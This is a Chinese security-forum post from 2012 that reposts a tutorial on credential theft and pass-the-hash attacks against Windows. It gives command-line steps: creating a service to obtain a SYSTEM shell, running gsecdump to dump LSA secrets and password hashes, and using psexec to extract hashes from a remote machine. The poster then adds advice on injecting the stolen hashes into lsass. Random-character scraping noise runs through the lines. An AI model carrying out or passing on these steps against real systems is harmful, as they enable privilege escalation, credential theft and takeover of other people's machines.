找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1975|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
2 P: I2 a* ]. o; K. e
3 F9 m. Q0 D* r/ j2 e7 e+ jC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact( v1 `+ W, K4 O" i7 L; W
[SC] CreateService SUCCESS
- v! |/ T+ b" ]
9 G, ?) k, h! L  c4 a5 XC:\>sc start shellcmdline
1 i8 r4 U+ u, C3 Q0 d# `[SC] StartService FAILED 1053:
" j7 P9 A7 v2 O6 ^& \8 [! Q  F
2 r  X- |3 L! l3 a) u8 v! Y( s7 EThe service did not respond to the start or control request in a timely fashion.5 j  {- @1 M" _+ c6 z6 M; W7 t

9 h) l3 Q; l" ~  \. @C:\>sc delete shellcmdline
- |. a' T, \/ c$ \[SC] DeleteService SUCCESS6 n/ g+ n0 e  ~+ E
& e2 U+ B9 y, X9 I$ A. Q
------------
% y8 B8 q* r2 E/ Q, |/ \7 t3 u. \
Then in the new DOS window:
- n! r. j4 R- t0 n
' s% {" \1 G7 zMicrosoft Windows XP [Version 5.1.2600]
" s4 _- b: ~/ q7 q: ?(C) Copyright 1985-2001 Microsoft Corp.; [$ Q( q$ C2 I% g7 n/ U" n+ u
# n+ O" q$ o8 f% a; I7 |, _5 T1 p
C:\WINDOWS\system32>whoami
2 \* [2 ^1 [) q9 ^/ j8 BNT AUTHORITY\SYSTEM9 [" x% J9 e' J# e. ]
. f, k4 o$ I; d7 M! k7 h: Y
C:\WINDOWS\system32>gsecdump -h# g( p6 ^  `/ ?& F  k# I
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)1 w8 E0 L/ @/ `6 P+ a1 c( n2 o
usage: gsecdump [options]
5 h3 T$ [4 P% K6 {$ q0 w- a" D- _8 q" `8 n  T% Q& O% B
options:# R7 k0 d( h/ a) ?1 y* k  ~
-h [ --help ] show help% n9 w8 v: ^7 i$ [, v" b
-a [ --dump_all ] dump all secrets- f3 y. j$ y0 h3 a. k& z' B
-l [ --dump_lsa ] dump lsa secrets
+ S1 z" {1 H* F  N$ {0 n-w [ --dump_wireless ] dump microsoft wireless connections
$ g. U4 R( l+ z7 |; W& u, U# C- C-u [ --dump_usedhashes ] dump hashes from active logon sessions+ b( U2 A0 O+ J% n4 H7 D9 Y7 c
-s [ --dump_hashes ] dump hashes from SAM/AD
% s& U: \6 D/ J3 E3 z6 {2 j$ k* k# P: B, i( b" x
Although I like to use:6 b* i5 |8 F: I! o2 d/ @

- N! T" Z$ `6 z! \- S4 `' s) E# R& D: lPsExec v1.83 - Execute processes remotely, y( g( k0 _2 ?2 p( a7 z# N* f5 F9 j
Copyright (C) 2001-2007 Mark Russinovich
! }1 z) y' a; E( R' TSysinternals - 链接标记[url]www.sysinternals.com[/url]
% x& b2 ]& [% d4 z' }, m# B
2 K2 H5 t4 G1 @1 nC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
7 X2 h, v% {& }6 h2 p! g7 F* U+ c) x
to get the hashes from active logon sessions of a remote system.3 b( D& x- }+ q: ^
0 V; A; L  _( X. M% `
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
7 t# G8 P( h% B: p5 m1 S
! z. D4 x& o0 b; v提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
; t. C4 _% u8 `* U, ?4 D% X  [1 [原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
/ q( Z5 J2 P$ e& ^
+ l* v0 W% j2 B我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。5 s! H1 g# R+ n$ D- D( h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表